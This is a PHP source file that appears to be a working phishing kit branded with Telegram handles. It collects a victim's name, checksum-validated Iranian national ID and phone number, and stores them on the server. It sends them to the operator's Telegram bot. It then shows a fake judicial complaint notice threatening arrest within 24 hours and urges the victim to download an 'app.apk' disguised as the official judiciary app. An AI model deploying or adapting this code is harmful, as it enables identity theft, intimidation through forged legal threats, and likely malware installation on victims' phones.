<?php
# ➣ t.me/cardotp
include "info.php";
define('TOKEN', $token);

function bot($method, $datas = [])
{
    $url = "https://api.telegram.org/bot" . TOKEN . "/" . $method;
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $datas);
    $res = curl_exec($ch);
    if (curl_error($ch)) {

        var_dump(curl_error($ch));

    } else {
        return json_decode($res);
    }
}
# ➣ t.me/cardotp
function sendMessage($chatid, $text, $keyboard)
{
    bot('sendMessage', [
        'chat_id' => $chatid,
        'text' => $text,
        'parse_mode' => 'HTML',
        'reply_markup' => $keyboard,
        'resize_keyboard' => true,
        'disable_web_page_preview' => true
    ]);
}
# ➣ t.me/cardotp
function checkMeliCode($meli)
{

    $cDigitLast = substr($meli, strlen($meli) - 1);
    $fMeli = strval(intval($meli));

    if ((str_split($fMeli))[0] == "0" && !(8 <= strlen($fMeli) && strlen($fMeli) < 10)) return false;

    $nineLeftDigits = substr($meli, 0, strlen($meli) - 1);

    $positionNumber = 10;
    $result = 0;

    foreach (str_split($nineLeftDigits) as $chr) {
        $digit = intval($chr);
        $result += $digit * $positionNumber;
        $positionNumber--;
    }

    $remain = $result % 11;

    $controllerNumber = $remain;

    if (2 <= $remain) {
        $controllerNumber = 11 - $remain;
    }

    return $cDigitLast == $controllerNumber;

}

function checkPhone($phone)
{
    if (preg_match("/^09[0-9]{9}$/", $phone)) {
        return true;
    } else {
        return false;
    }
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $name = $_POST['name'];
    $melicode = $_POST['codemeli'];
    $phone = $_POST['tel'];

    if (!checkMeliCode($melicode)) echo '<section class="alert bg_orange">کد ملی نامعتبر</section>';
    elseif (!checkPhone($phone)) echo '<section class="alert bg_orange">فرمت شماره نامعتبر</section>';
    else {
        $userData = [
            "name" => $name,
            "codemeli" => $melicode
        ];
        file_put_contents("users/$phone.json", json_encode($userData));
        $text = "ɴᴇᴡ ʀᴇɢɪꜱᴛʀᴀᴛɪᴏɴ ʀᴇᴄᴇɪᴠᴇᴅ

ɴᴀᴍᴇ : $name
ᴘʜᴏɴᴇ : $phone
ᴄᴏᴅᴇ ᴍᴇʟɪ : $melicode";
        $key[] = [['text' => "CAPITAN ᴛᴇᴀᴍ", 'url' => "t.me/HazbiN_Team"]];
        $keyboard2 = json_encode(['inline_keyboard' => $key]);
        sendMessage($chat_id,$text,$keyboard2);
        echo '<style>.none{display:none}</style>
<p class="p_des">
کاربر گرامی ' . $name . ' شکوائیه ای علیه شما در تاریخ 1403/4/4 با کد پیگیری 31002158511
در حساب کاربری شما در سامانه ابلاغ قرار گرفته است.<br />
در صورت عدم پیگیری حداکثر طی 24 ساعت آینده حکم جلب شما توسط مقام قضایی صادر خواهد شد.</p>
<button type="button" class="btn bg_green" onclick="window.location.href=\'app.apk\'">دانلود ثنا</button>
';
    }

}
